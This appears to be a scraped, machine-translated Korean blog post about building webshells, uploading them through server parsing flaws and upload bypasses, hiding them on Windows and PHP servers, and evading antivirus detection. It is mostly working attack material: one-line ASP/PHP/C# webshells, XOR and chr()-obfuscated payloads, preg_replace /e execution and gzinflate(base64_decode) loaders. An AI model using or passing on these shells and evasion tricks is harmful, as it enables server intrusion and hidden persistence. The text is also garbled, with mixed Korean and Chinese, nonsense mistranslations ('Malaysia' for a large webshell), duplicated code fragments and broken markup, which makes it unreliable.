Webshell 구현 및 숨기기 연구

WBOY
풀어 주다: 2016-08-08 09:21:22
원래의
2413명이 탐색했습니다.

1. webshell이란

  1. webshell 소개

webshell은 이름에서 알 수 있듯이 web은 웹 서버를 의미하며, shell은 다음과 같이 작성된 스크립트입니다. 스크립팅 언어 프로그램인 webshell은 웹 관리 도구로, 웹 서버를 운영하는 권한을 가지고 있으며 webadmin이라고도 합니다. Webshell은 일반적으로 웹사이트 관리자가 웹사이트 관리, 서버 관리 등을 위해 사용합니다. 그러나 webshell은 상대적으로 강력하기 때문에 파일 업로드 및 다운로드, 데이터베이스 보기, 심지어 서버에서 일부 시스템 관련 명령(예: 사용자 생성)을 호출할 수도 있습니다. , 파일 수정 또는 삭제 등) 해커가 주로 사용하는 방법으로, 해커는 자신이 작성한 웹쉘을 웹 서버 페이지의 디렉토리에 업로드한 후 페이지 접근을 통해 침입하거나, 삽입하여 로컬 컴퓨터에 연결하는 등의 방법을 사용합니다. 한 문장 일부 관련 도구는 서버에 직접 침입 작업을 수행합니다.

  1. 웹셸의 분류
웹셸은 크게 PHP 스크립트 트로이목마, ASP 스크립트 트로이목마, 스크립트 기반의 .NET 기반 스크립트 트로이목마, JSP 스크립트 트로이목마로 나눌 수 있습니다. 해외에도 Python 스크립트 언어로 작성된 동적 웹페이지가 있고, 물론 이와 관련된 웹쉘도 있습니다.
기능에 따라 큰말과 작은말로 나뉘기도 합니다. 작은말은 보통 트로이목마라는 문장을 가리킵니다. 예를 들면 <%eval request("pass")%> 문장을 문서 내부로 변환한 다음 파일 이름을 xx.asp로 변경합니다. 그런 다음 서버로 보냅니다. 여기서 eval 메소드는 request("pass")를 코드 실행으로 변환합니다. 요청 함수의 기능은 외부 파일을 적용하는 것입니다. 이는 한 문장으로 표현된 트로이 목마의 클라이언트 구성과 같습니다. 서버 구성(즉, 로컬 구성):

기본값


<중앙>
<입력 유형=제출 값=제출>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

<form action=http : //호스트 경로/TEXT.asp method=post>

< 텍스트 영역 이름==120=10너비 =45>

lP=서버를 설정합니다.createObject ("Adodb.Stream")//스트림 객체 생성

lP.열기//열기

lP.유형=2//텍스트 모드

lP.CharSet="gb2312"//글꼴 표준

lP.텍스트 쓰기 요청("newvalue")

lP.SaveToFile 서버.mappath("newmm.asp"), 2//파일을 덮어써서 newmm.asp에 트로이 목마 내용을 씁니다. 2는 덮어쓰는 방법입니다.

lP.닫기//객체 닫기

lP=설정//객체 해제

응답.리디렉션"newmm.asp"//newmm으로 리디렉션 .asp

</텍스트 영역>

<텍스트 영역 이름=새 값 =120=10너비=45> (트로이 목마 생성을 위한 콘텐츠 추가)

</텍스트 영역>

<BR>

<센터>

< br>

<입력 유형=제출 = 제출>

여기서 트로이 목마는 양식을 제출하여 제출됩니다. 구체적인 방법은 개체 IP를 정의한 후 newvalue의 내용을 텍스트 형식으로 작성하는 것입니다. (newvalue의 내용은 textarea에 있습니다.) 정의) 덮어쓰기를 통해 ASP 파일을 생성한 후 이 스크립트를 실행합니다. 클라이언트의 값은 양식의 이름을 나타내며 서버(로컬 시스템)의 사후 제출에 있는 양식 이름과 동일해야 합니다. 따라서 여기의 값은 비밀번호와 같은 임의의 문자일 수 있습니다. , 하지만 '비밀번호'는 일반 텍스트이므로 가로챌 수 있습니다. PHP의 한 문장 원칙은 위의 원칙과 유사합니다. 즉, 언어의 차이로 인해 구문이 달라집니다. 이것이 기본적으로 조랑말이 작동하는 방식입니다.

말레이시아의 작업 모델은 훨씬 간단합니다. 클라이언트와 서버 사이에는 차이가 없습니다. 일부 스크립트 전문가는 한 문장의 트로이 목마를 서버 측에 직접 통합하여 말레이시아에 업로드했습니다. 그런 다음 말레이시아 URL 주소를 복사하여 직접 접속하여 해당 페이지의 웹 서버에 침투 작업을 수행합니다. 그러나 일부 웹사이트에서는 파일 업로드에 엄격한 제한이 있습니다. Da Ma에는 기능이 많기 때문에 크기가 상대적으로 커서 웹사이트의 업로드 제한을 초과할 수 있습니다. 그러나 Da Ma의 크기는 제어할 수 있습니다. 코드를 여러 번 삽입하거나 잘못된 파일에 코드를 삽입하는 경우) Xiaoma의 작업은 더 번거롭습니다. 먼저 Xiaoma를 업로드하여 웹셸을 얻은 다음 Xiaoma를 업로드하여 Xiaoma의 연결을 통해 서버를 얻을 수 있습니다.

2. 웹쉘 업로드 방법

1. 취약점 업로드 분석

이제 웹 서버 시스템마다 다른 웹 서버 프로그램이 주류를 이루고 있습니다. iis이고 Linux의 주류는 nginx입니다. 이러한 서비스는 웹 서버 구축에 큰 도움을 주지만 서버에 숨겨진 위험을 가져오기도 합니다. 이러한 서버에는 해커가 쉽게 악용할 수 있는 몇 가지 취약점이 있습니다.

(1)iis 디렉터리 구문 분석 취약점

예: /xx.asp/xx.jpg
업로드된 JPG 파일이더라도 해당 파일이 xx.asp에 있는 경우 iis가 이미지 파일을 xx.asp로 구문 분석하는 폴더입니다. 이 취약점은 iis5.x/6.0 버전에 존재합니다.

(2) 파일 구문 분석 취약점

예: xx.asp;.jpg. 웹 페이지가 업로드되면 jpg 파일이 인식되지만 iis는 업로드 후 이를 구문 분석하지 않습니다. 이후 문자도 파일을 asp 파일로 구문 분석합니다. 이 취약점은 iis5.x/6.0 버전에 존재합니다.

(3) 파일 이름 분석
예: xx.cer/xx.cdx/xx.asa. iis6.0에서는 cer 파일, cdx 파일, asa 파일이 실행 파일로 처리되며 내부의 ASP 코드도 실행됩니다. (asa 파일은 asp 전용 구성 파일이고, cer는 인증서 파일입니다.)

(4) fast-CGI 파싱 취약점

웹 서버에서 fast-CGI가 활성화된 경우 xx.jpg 이미지를 업로드하세요. 내용은 다음과 같습니다:

기본값

1

fputs(fopen('shell.php','w'),'eval($_POST[shell])?>');?>

1 < ;?phpfputs(fopen('shell.php','w'),' <🎜>평가<🎜>(<🎜>$_POST<🎜>[<🎜>쉘<🎜>]<🎜>)<🎜>?>') ;?> tr >

여기서 사용된 fput은 shell.php 파일을 생성하고 문장을 작성합니다. xx.jpg/.php 경로에 액세스하면 이 경로에 한 문장으로 구성된 Trojan shell.php가 생성됩니다. 이 취약점은 IIS 7.0/7.5 및 Nginx 버전 8.03 이하에 존재합니다. 로케일: PHP, prel, Bourne Shell, C 및 기타 언어.

*참고: fast-CGI는 CGI의 업그레이드 버전입니다. CGI는 서버에서 인간-컴퓨터 상호 작용을 제공하는 인터페이스를 의미합니다. CGI는 실행될 때마다 프로세스를 시작하기 위해 포크를 사용해야 하지만 fast-CGI는 항상 활성화 후에 실행되므로 모든 요청에 ​​대해 프로세스를 포크할 필요가 없습니다. 일반 CGI보다 메모리를 적게 차지합니다.

(5) Apache 구문 분석 취약점
Apache 구문 분석 방식은 오른쪽에서 왼쪽으로 이루어집니다. 성공적으로 구문 분석할 수 없으면 왼쪽으로 이동하려고 하지만 일반적으로 백그라운드 업로드는 업로드된 파일의 가장 오른쪽 접미사이므로 이를 기반으로 말 이름을 xx.php.rar로 지정할 수 있습니다. Apache는 rar를 구문 분석할 수 없으므로 php로 구문 분석하지만 백그라운드 업로드 지점에서는 rar로 구문 분석하여 우회합니다. 업로드 파일 접미사 제한

2. 업로드 자르기

사진을 업로드할 때 이름은 1.asp.jpg(asp 뒤에 공백이 있습니다) 업로드할 때는 NC 또는 burpsuite Capture를 사용하세요. 양식을 작성하고 업로드 이름 asp 뒤에 %00을 추가합니다(burpsuite에서 HEX 값을 직접 편집할 수 있습니다. 공백의 HEX 값은 20입니다. 20을 00으로 변경합니다). HEX가 00이면 잘림을 의미하고 20은 잘림을 의미합니다. 공백을 의미하는 경우 스크립트의 JPG 확인 문을 무시하고 ASP에 직접 업로드한다는 의미입니다.

3. 백엔드 데이터베이스 백업

일부 기업의 백엔드 관리 시스템에는 데이터베이스를 백업하는 기능이 있습니다(예를 들어 Southern CMS에는 데이터베이스를 백업하는 기능이 있습니다). . 트로이 목마 문장이 포함된 사진을 업로드하거나 말레이시아 텍스트를 jpg 형식으로 변경한 후 데이터베이스 백업 기능을 사용하여 사진을 asp 및 스크립트 문 형식으로 구문 분석한 다음 트로이 목마를 전달할 수 있는 기타 콘텐츠로 백업할 수 있습니다. 웹에 접속하여 실행할 수 있지만 이 방법은 현재 대부분의 cms에서 이 백업 기능을 취소하거나 비활성화했습니다.

4. 데이터베이스 문을 사용하여

(1) mysql 데이터베이스를 outfile로 업로드

이 방법의 전제는 웹사이트에 해당 주입 지점이 있어야 하며 현재 사용자는 업로드 권한이 있어야 하며, 서버에 현재 웹페이지의 절대 경로가 있어야 합니다. 방법은 공동 쿼리를 이용해 한 문장의 트로이목마를 웹사이트 아래의 PHP 파일로 가져온 뒤, 서버를 이용해 해당 웹사이트에 연결하는 것이다. 그러나 위 방법의 조건은 너무 가혹하여 거의 발생하지 않습니다.

(2) Trojan을 작성하는 새 테이블 만들기
일부 오픈소스 cms나 자체 제작한 웹셸에는 데이터베이스 관리 기능이 있습니다. 먼저 데이터베이스 관리 기능에 SQL 쿼리 기능이 있습니다. shell( codetext); shell이라는 테이블을 생성합니다. 테이블에는 code라는 목록이 있고 유형은 text입니다. 그런 다음 쉘(코드) 값('한 문장 말')에 삽입을 사용합니다. 여기서 쉘 테이블의 코드 열에 한 문장 말의 값이 할당된 다음 사용자 정의 백업을 통해 테이블을 x.php로 백업합니다. x를 php로 파싱한 후 실행합니다. 이것은 x.php가 아니며 x를 php로 파싱해야 합니다. 웹 서버마다 서비스 프로그램이 다르며 필터링 규칙도 다르며 다른 방법을 사용할 수도 있습니다.

(3)phpMyadmin 설정 오류
phpMyadmin은 웹사이트 데이터베이스를 관리하는 데 사용되는 도구로, 파일을 볼 때 $cfg 값이 config.inc.php인 경우. ['Servers'][$i]['auth_type'] 매개변수 설정이 설정되지 않았습니다(기본값은 config). 이는 데이터베이스에 로그인할 때 해당 확인이 수행되지 않음을 의미합니다. 데이터베이스에 직접 연결할 수 있습니다. , 일부 버전의 Mysql에서는 기본 로그인이 루트 사용자(즉, 관리자)로 로그인되므로 로그인 권한이 최대가 됩니다. 그러나 루트는 일반적으로 로컬로만 로그인할 수 있으므로 원격 로그인 사용자를 생성해야 합니다. 원격 로그인 사용자로 로그인한 후 테이블을 생성하고 그 안에 한 문장의 트로이 목마를 작성합니다.

3. 웹쉘의 '보안'

1. 웹쉘 숨기기에 대하여

웹쉘 업로드 시 웹쉘을 숨겨야 합니다. 웹셸을 숨기는 첫 번째 목적은 웹사이트 관리자가 이를 발견하여 삭제하는 것을 방지하는 것입니다. 두 번째 목적은 다른 해커가 이 파일을 발견하여 사용하는 것을 방지하는 것입니다.

(1) 말레이시아의 숨겨진

①언데드 좀비

Windows 시스템에는 시스템 예약 폴더 이름이 있습니다. Windows에서는 이러한 이름을 사용하여 예약 폴더를 지정하는 것을 허용하지 않습니다. aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. 그러나 다음과 같은 Windows 복사 명령을 사용하여 만들 수 있습니다.

Default

1

c:>복사3.asp .C:aux.asp

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image022.jpg
C 드라이브에 aux.asp를 만듭니다. 이 파일은 그래픽 인터페이스에서 삭제할 수 없습니다.
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.png
삭제하려면 del 명령어를 사용해야 합니다.
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.png
삭제 후 메시지가 표시되지 않지만 파일이 실제로 사라졌습니다.
물론 이 방법을 사용하면 그래픽 인터페이스를 통해 삭제할 수 없는 웹셸을 만들 수 있지만, 웹페이지의 루트 디렉터리에 직접 배치하는 경우에도 경험이 있는 경우 삭제됩니다. 네트워크 관리자가 이를 볼 수 있습니다.

②clsid 숨김

Windows의 모든 프로그램에는 clsid가 있습니다. 폴더 이름을 x.{program clsid}로 지정한 경우 다음 두 명령을 입력하세요.
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026.jpg
생성 후
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png

클릭하여 제어판에 들어가지만 실제로는 파일이 여전히 폴더이고 그 안에 Malaysia가 여전히 존재합니다. clsid를 사용하여 해당 폴더를 만들고 해당 프로그램의 이름을 지정할 수도 있습니다. 예를 들어, 네트워크 관리자는 휴지통 폴더를 입력하여 휴지통 clsid가 있는 폴더를 만들고 그 안에 예약어 asp를 복사할 수도 있습니다.

기본값을 사용할 수도 있습니다.

1

attrib+h+s+r+d/s/d

1

속성
+
h
+
s

+r

+d

/

/

d

1

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png

이 파일의 속성을 수정하고 숨기세요. 일반적으로 Windows는 기본적으로 숨김 파일을 표시하지 않으며, 휴지통 폴더가 자동으로 생성되므로 불멸의 웹쉘이 서버에 숨겨질 수 있습니다. 3드라이버 숨기기 기술 Windows 파일 시스템에서는 폴더를 열 때 시스템이 IRP_MJ_DIRECTORY_Control 함수를 보내는 것이 원칙입니다. 이 함수는 버퍼와 정보를 할당할 수 있습니다. 폴더 아래의 하위 폴더를 순회하여 얻은 내용은 버퍼에 저장됩니다. 순회 시 일치하는 파일 이름을 찾아보고, 파일 이름이 일치하면 현재 폴더나 파일을 우회하는 원리로 코드를 확인했습니다. 제가 이해한 바에 따르면 대상 파일을 쿼리할 때 탐색된 포인터를 기준으로 파일의 오프셋을 추가하며 대상 폴더를 스캔하지 않고 직접 건너뜁니다. 이 기술의 구현과 관련하여 인터넷에 많은 C 소스코드가 있음에도 불구하고 헤더 파일 지원 및 시스템 지원으로 인해 작동이 어렵습니다. (시스템마다 파일 시스템이 다를 수 있음) . 온라인에서 Easy File Locker 프로그램을 찾았는데 웹 서버에 설치하고 대상 파일에 대한 권한을 설정해야 합니다. 기본값file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
1파일:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
권한 설정에는 읽기, 쓰기, 삭제 및 표시가 포함됩니다.

기본값

1

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg

1 td>

파일
:
///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg

위 그림에서 볼 수 있듯이 앞서 언급한 대로 순회가 직접 우회되기 때문에 절대 경로를 숨겼습니다. 접근 가능합니다. 내 이해는 다음과 같습니다

1
2
3
4

c:WINDOWSxlkfs.dat

c:WINDOWSxlkfs.dll

c:WINDOWSxlkfs.ini

c:WINDOWSsystem32driversxlkfs.sys


기본

c:WINDOWSxlkfs.dat c:WINDOWSxlkfs.dll c:WINDOWSxlkfs.ini c:WINDOWSsystem32driversxlkfs.sys
tbody>
1
2
3

4

c
:
WINDOWS
xlkfs

.

데이터

:

WINDOWS

1

include($include);?>

xlkfs.dllc:WINDOWSxlkfs.inic:WINDOWSsystem32드라이버xlkfs.sys
이 4개 파일은 순회 쿼리를 대체합니다. 숨겨진 파일에 액세스하려면 절대 경로를 입력해도 절대 경로 쿼리가 적용되지 않지만 위 4개 파일을 통해 쿼리됩니다. 숨겨진 파일에 대해 별도의 드라이버를 만드는 것과 동일합니다. 관리자에게 들키지 않으려면 Easy FileLocker 프로그램을 삭제하면 되지만, 위 4개 파일은 삭제할 수 없습니다. 프로그램을 삭제한 후에도 백도어 숨기기 기능을 수행하는 절대 경로를 입력하여 계속 액세스할 수 있습니다4레지스트리 숨기기레지스트리 경로: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer\AdvancedFolderHiddenSHOWALL 이 경로에 CheckedValue 키가 있습니다. 0으로 변경하세요. CheckValue 키가 없으면 직접 만들고 값을 0으로 지정하세요. 그러면 생성된 숨김 파일이 완전히 숨겨집니다. 폴더 옵션. 다음 "모든 파일 표시" 옵션도 표시할 수 없습니다. (2) 한 문장 트로이 목마 숨기기 ①헤더 파일 포함 숨기기웹의 일부 스크립트 파일에는 일부 파일에 include 문이 있는데 이를 사용할 수 있습니다. 메소드에는 문장 파일이 포함되어 있으며 이 페이지에 액세스할 때 이러한 문장이 직접 호출됩니다. asp include 문: , 경로를 직접 입력하며 파일 경로는 웹 서버의 경로입니다. Webmaster Stop을 사용하여 이미지에 NTFS 스트림 포니의 문장을 작성할 수 있습니다. 경로에 ''를 ':'로 쓴 후 이미지가 표시되지 않습니다. 웹 서버의 asp 파일로 이동하여 파일 시작 부분에 include 문을 작성합니다. <🎜><🎜>php에는 <🎜><🎜><🎜><🎜><🎜><🎜>Default<🎜><🎜><🎜><🎜><🎜><🎜 명령문이 포함되어 있습니다. >
1
<🎜>포함<🎜>(<🎜> $ 포함<🎜>)<🎜>;<🎜>?>

여기서 $include는 다음과 같은 외부 경로일 수 있습니다.

http://www.aaa.com/1.php?Include=http://www .bbb.com/hehe.php

이 aaa의 1.php 내용은

기본

1

1

include($include);?>

<🎜>포함<🎜>(<🎜>$include<🎜>)<🎜>;<🎜>?>

은 포함을 의미합니다. bbb는 외부 서버입니다. 단, 이 서버는 PHP를 지원할 수 없습니다. 그렇지 않으면 bbb 서버에서 hehe.php(즉, 한 문장 말)는 실행되지만 aaa는 실행되지 않습니다.

②구성 파일 숨김 문장(PHP)

PHP 웹셸을 얻은 후 php.ini를 사용하여 파일을 숨기고 구성 파일을 편집할 수 있습니다. 특정 파일의 내용을 인터페이스의 머리글과 바닥글에 추가:
auto_prepend_file =hehe.php
그런 다음
include_path를 살펴보세요. = "E:PHPnow-1.5.6htdocs;"
이 구성 정보는 머리글과 바닥글을 로드할 컬렉션의 위치를 ​​나타냅니다. 경로 규칙은 "path1;path2"입니다. path1 경로의 폴더는 경로에 있는 파일에 헤더 및 바닥글 파일을 추가합니다. 여기에는 루트 경로를 나타내는 '.'이 있으므로 홈페이지에 추가하는 것과 동일합니다. .asp 파일이면 끝입니다. PHP를 통해 헤더 기능을 추가하고 웹 사이트 홈 페이지에 문장을 작성합니다.

3404 포니

404 포니는 접속시 존재하지 않는 404 페이지를 표시하지만 실제로는 트로이목마 코드가 실행된 상태입니다. 일반적으로 Shift를 5번 누르면 제거됩니다. 밖으로.

4. 웹쉘 안티 바이러스와 안티 바이러스에 대한 한 문장

1. 우회 탐지(PHP) 구축 방법

일반 탐지 프로그램에서는 이러한 "_POST"를 필터링합니다. , "system" 및 "call_user_func_array"와 같은 문자의 경우 현재 일부 감지 프로그램을 우회하기 위한 구성 방법을 사용할 수 있습니다. 기본 원칙은 PHP의 각 문자가 XOR로 대체된다는 것입니다. 두 문자의 값입니다.
예를 들어 코드는 다음과 같습니다

Default

1
2
3
4
5
6
7
8

@$_++; // 这里++让’_’自加1

$__=("#"^"|"); // _

$__=("."^"~"); // P

$__=("/"^"`"); // O

$__=("|"^"/"); // S

$__=("{"^"/"); // T

?>

1
2
3
4
5
6
7
8
<🎜><🎜><🎜>@<🎜>$_<🎜>++<🎜>;<🎜>                                                                🎜><🎜><🎜><🎜><🎜><🎜><🎜 ><🎜>$__<🎜>=<🎜>(<🎜>"#"<🎜>^<🎜>"|"< 🎜>) <🎜> 🎜><🎜>$__<🎜>=< 🎜>(<🎜>"."<🎜>^<🎜>"~"<🎜>)<🎜>;<🎜>                                                 ><🎜><🎜><🎜> <🎜><🎜><🎜>< 🎜><🎜><🎜><🎜><🎜><🎜>$__<🎜>=<🎜>(<🎜> "/"<🎜>^<🎜>"`"<🎜>)<🎜> ;<🎜>                               ><🎜><🎜><🎜><🎜><🎜><🎜>$__<🎜>=<🎜>(<🎜>"|"<🎜>^<🎜>"/"< 🎜>)< 🎜>;<🎜> <🎜>// ㅇ<🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜>< 🎜><🎜 >$__<🎜>=<🎜>(<🎜>"{"<🎜>^<🎜>"/"<🎜>)<🎜>;<🎜>                                                 <🎜><🎜><🎜 ><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜>?>

그러면 구조와 문장은

Default로 쓸 수 있습니다.

1
2
3

@$_++;

$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); // $__的值为_POST

@${$__}[!$_](${$__}[$_]);?>

1
2
3

@

$_
+ +
;

$__

=

(

"#""|"

)

.

1

$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/")

(

"."

^

"~"

)

.

(

"/"
^

"`"
)
.
(

"|"^"/").

(

"{"

^)

;

 

// $__의 값은 _POST @${$__}[!$_]($ {$__}[$_]);?> // 결과는 @$_POST[0]($POST[1])!$_는 1의 반대를 나타냅니다. 언어에서는 1이 true, 그 반대가 0(false)을 나타냅니다.그런데 이 우회 방법은 잘 생각해보면 두 문자의 이진값을 XOR하더라도 특정 문자를 사용하고 싶다면 여전히 그 값을 적용하는 방식이다. 예를 들어 기본값$__=("#"^"|")과 같습니다. ("."^"~").(" /"^"`").("|"^"/").("{"^"/")의 바이너리 값은 탐지 프로그램이 탐지한 경우 _POST 문자의 값과 동일합니다. 바이너리 코드의 값을 변경하더라도 여전히 종료됩니다. 2. 정규식 대체 방법(PHP) PHP에는 정규식 대체를 구현할 수 있는 preg_replace() 함수가 있습니다. 탐지 시스템을 우회하기 위해 대체를 사용하려면 PHP 스크립트 언어의 함수 기능도 필요합니다. 함수가 호출될 때 함수의 형식 매개변수에 할당된 값에 명령이 포함되어 있으면 명령이 실행됩니다. 기본값(.+?)/ies",'funfunc("1")', $_POST["cmd"]); ?>테이블>

위 코드는 먼저 빈 함수를 만든 후 preg_replace 함수를 사용하여 </title>을 바꾸는 과정입니다. ; cmd 형식입니다. (HTML의 테마는 다음과 같습니다.) funfunc의 경우 게시물 형식에 <blockquote><div align="left"><title>{${phpinfo()}}</title>로 값을 작성합니다. ;</p></blockquote> <div align="left"> (물론 여기의 phpinfo()는 다른 명령으로 대체될 수 있습니다.) 대체를 통해 </p><blockquote><div align="left">funfunc({${phpinfo()} })</p></blockquote><div align="left">${}가 {}의 콘텐츠를 구문 분석할 수 있으므로 여기의 phpinfo가 원활하게 실행될 수 있습니다. </p><p>3. 즉시 생성 방식(PHP) </p><div align="left">헤더 파일 포함을 사용할 경우 포함된 헤더 파일인 php를 스캐너에서 쉽게 스캔하여 파일을 생성할 수 있습니다. . 안에 php 같은 문장이 적혀있습니다. 말에 접근하기 전에 말을 생성하세요. 하지만 이 기능은 민감하고 쉽게 죽을 수 있습니다. </p><p>4. 회피 방법(asp) </p><div align="left">일부 ASP 서버는 한 문장의 횡설수설을 방지하기 위해 <%,%>를 필터링하므로 다음을 사용할 수 있습니다. <div align="left"> <div data-settings=" minimize scroll-mouseover"><div data-settings=" show"> <p><span>기본값</span></p> <p><textarea read data-settings="dblclick"><script언어=VBScriptrunat=server>요청 실행("cmd")</Script></textarea> </p> <p></p> <tbody><tr><td data-settings="show"> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe41b4537101191-1">1</div> </td> <td> <p></p> <p><span><<span>scriptlanguage<span>=<span>VBScriptrunat<span>=<span>server<span>><span>execute <span>request<span>(<span>"cmd"<span>)<span><<span>/<span>Script<span>></span></span></span></span></span></span></span></p> </td> </tr></tbody></table> <div data-line="crayon-559e92dfe41b4537101191-1">1 <td><div align="left"><<div align="left">스크립트 언어</p>=<div align="left">VBScriptrunat<div data-settings=" minimize scroll-mouseover">=<div data-settings=" show">서버<p>><span title="含多种语言">실행 <span> 요청 </span>(</span>"cmd")<<p>/<textarea read data-settings="dblclick">스크립트</textarea>><p></p> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe41ba878449212-1">1</div> </td> <td> <p></p> <p><span><script <span>language<span>=<span>"C#"<span><span>runat<span>=<span>"server"<span>><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>;<span></script></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></p> </td> </tr></tbody></table> </div></td> </div> </td></tr></tbody>은 기능은 동일하지만 형태가 다릅니다. 특정 스크립트 언어 피하기: aspx 한 문장기본값<script 언어="C#" runat="server">WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");</script><table><tbody><tr> <td data-settings="show"><div data-line="crayon-559e92dfe41ba878449212-1">1</div></td> <td><스크립트 <🎜>언어<🎜>=<🎜>"C#"<🎜><🎜>runat<🎜>=<🎜>"서버"<🎜>>WebAdmin2Y .x.y아아아아=newWebAdmin2Y.x.y("add6bb58e139be10");</script></td> </tr></tbody></table> <div align="left">这里使用C#语言写一句话马。<p>5.拆分法(asp)</p> <div align="left">将<%eval request(“x”)%>拆分为<%Y=request(“x”)%><%eval(Y)%>,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。<div align="left">还有拆分法加强版:<div align="left"><div data-settings=" minimize scroll-mouseover"><div data-settings=" show"> <p><span title="含多种语言"><span>Default</span></span></p> <p><textarea read data-settings="dblclick"><%IfRequest("MH")<>"" Then Execute(Request("MH"))%> <%if request("MH")<>""thensession("MH")=request("MH"):end if:ifsession("MH")<>"" then executesession("MH")%></textarea></p> <p></p> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe41ca643242287-1">1<div data-line="crayon-559e92dfe41ca643242287-2">2</div> </div> </td> <td> <p></p> <p><span><%<span>IfRequest<span>(<span>"MH"<span>)<span><><span>""<span><span>Then<span><span>Execute<span>(<span>Request<span>(<span>"MH"<span>)<span>)<span>%></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></p> <p><span><%<span>if<span><span>request<span>(<span>"MH"<span>)<span><><span>""<span>thensession<span>(<span>"MH"<span>)<span>=<span>request<span>(<span>"MH"<span>)<span>:<span>end<span><span>if<span>:<span>ifsession<span>(<span>"MH"<span>)<span><><span>""<span><span>then<span><span>executesession<span>(<span>"MH"<span>)<span>%></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></p> </td> </tr></tbody></table> <div align="left">以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。<p>6.乱码变形(ANSI->Unicode加密)</p> <div data-settings=" minimize scroll-mouseover"><div data-settings=" show"> <p><span title="含多种语言"><span>Default</span></span></p> <p><textarea read data-settings="dblclick"><%eval request("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”</textarea></p> <p></p> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe41d1811159800-1">1</div> </td> <td> <p></p> <p><span><%<span>eval<span><span>request<span>(<span>"#"<span>)<span>%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”</span></p> </td> </tr></tbody></table> <div align="left"><div data-settings=" minimize scroll-mouseover"><div data-settings=" show"> <p><span>Default</span></p> <p><textarea read data-settings="dblclick">eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%></textarea></p> <p></p> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe41d8590140859-1">1</div> </td> <td> <p></p> <p><span>eval<span>(<span>eval<span>(<span>chr<span>(<span>114<span>)<span>+<span>chr<span>(<span>101<span>)<span>+<span>chr<span>(<span>113<span>)<span>+<span>chr<span>(<span>117<span>)<span>+<span>chr<span>(<span>101<span>)<span>+<span>chr<span>(<span>115<span>)<span>+<span>chr<span>(<span>116<span>)<span>)<span>(<span>"brute"<span>)<span>)<span>%<span>&<span>gt<span>;</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></p> </td> </tr></tbody></table> <div align="left">上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为<div align="left"><div data-settings=" minimize scroll-mouseover"><div data-settings=" show"> <p><span title="含多种语言"><span>Default</span></span></p> <p><textarea read data-settings="dblclick"><%eval (eval(request("brute"))%></textarea></p> <p></p> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe41de679898723-1">1</div> </td> <td> <p></p> <p><span><%<span>eval<span><span>(<span>eval<span>(<span>request<span>(<span>"brute"<span>)<span>)<span>%></span></p> </td> </tr></tbody></table> <p>7. 말레이시아의 안티 바이러스 보호 </p> <p> (1) base4code 인코딩 </p> <div align="left"> <p>말레이시아의 안티 바이러스 보호는 말레이시아 코드 압축, 압축 후 base4 암호화 알고리즘 사용 후 끝에 </p> <div data-settings=" minimize scroll-mouseover"><div data-settings=" show"> <p><span>Default</span></p> <p><textarea read data-settings="dblclick"> 추가 말레이시아 @eval(gzinflate(base64_decode($code)));</textarea></p> <p></p> <table><tbody><tr> <td data-settings="show"> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe41e4037351059-1">1</div> </td> <td> <p></p> <p><span>@<span>eval<span>(<span>gzinflate<span>(<span>base64_decode<span>(<span>$<span>code<span>)<span>)<span>)<span>;</span></span></span></span></span></span></span></span></span></span></span></span></span></p> </td> </tr></tbody></table> <div data-line="crayon-559e92dfe41e4037351059-1">1</div> </td> <td>@평가(gzinflate(base64_decode($코드)));</td> </tr></tbody></table> <div align="left"> 스크립트를 실행할 수 있습니다. 그 중 